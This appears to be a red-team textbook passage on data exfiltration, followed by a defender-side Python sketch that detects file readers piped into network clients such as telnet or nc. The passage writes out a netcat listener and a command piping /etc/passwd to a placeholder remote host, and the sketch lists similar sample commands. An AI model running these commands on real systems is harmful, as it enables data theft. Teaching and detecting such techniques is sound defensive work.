Exfiltration of data
The unauthorized extrusion of data from a computer in any environment is referred to as exfiltration of data. Once persistence is maintained on the compromised system, and depending on whether the goal set at the beginning of the red teaming exercise or penetration test was to exfiltrate company secrets and demonstrate it, the following set of tools can be utilized to exfiltrate data from highly secured environments. In this section, we will explore different methods that attackers would utilize to send files from internal networks to attacker-controlled systems.
Using existing system services (Telnet, RDP, and VNC)
Now we will discuss some easy techniques to quickly grab files in the case of time-based access to compromised systems. Attackers can simply open up a port using Netcat by running
nc -lvp 2323 >Exfilteredfile
and then run the following command from the compromised Linux server:
cat /etc/passwd | telnet remoteIP 2323
This will display...
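A defender-side sketch of how the pipeline above could be spotted in recorded shell command lines (an added example, not from the original text). The program watch lists, path prefixes, function names and sample lines are assumptions constructed for illustration.

```python
import shlex

# Assumed watch lists for this example; tune them for your environment.
READERS = {"cat", "tar", "dd", "gzip", "base64"}
NET_CLIENTS = {"telnet", "nc", "ncat", "netcat"}
SENSITIVE_PREFIXES = ("/etc/", "/root/", "/home/")


def split_pipeline(cmdline):
    """Tokenize a shell command line and split it into stages on '|'."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars="|")
    lexer.whitespace_split = True
    stages = [[]]
    for tok in lexer:
        if tok == "|":
            stages.append([])
        else:
            stages[-1].append(tok)
    return [s for s in stages if s]


def find_piped_exfil(cmdline):
    """Return (file, client, host, port) when a file reader feeds a network
    client that was given an explicit host and port; otherwise None."""
    try:
        stages = split_pipeline(cmdline)
    except ValueError:  # unbalanced quotes: cannot be parsed, skip the line
        return None
    read_file = None
    for stage in stages:
        prog = stage[0].rsplit("/", 1)[-1]  # /usr/bin/nc -> nc
        args = [a for a in stage[1:] if not a.startswith("-")]
        if prog in READERS:
            hits = [a for a in args if a.startswith(SENSITIVE_PREFIXES)]
            read_file = hits[0] if hits else read_file
        elif (prog in NET_CLIENTS and read_file
              and len(args) >= 2 and args[-1].isdigit()):
            return (read_file, prog, args[-2], int(args[-1]))
    return None


# Constructed sample lines, e.g. from shell history or command-line auditing.
SAMPLE = [
    "cat /etc/passwd | telnet 203.0.113.10 2323",
    "nc -lvp 2323",
    "cat /etc/passwd | grep root",
    "tar czf - /home/alice|/usr/bin/nc -w 3 198.51.100.7 443",
]


def scan(lines):
    """Map each flagged command line to its finding."""
    return {l: f for l in lines if (f := find_piped_exfil(l))}
```

This only sees pipelines that appear in a single recorded command line; pairing it with egress filtering on unexpected outbound ports covers transfers it cannot see.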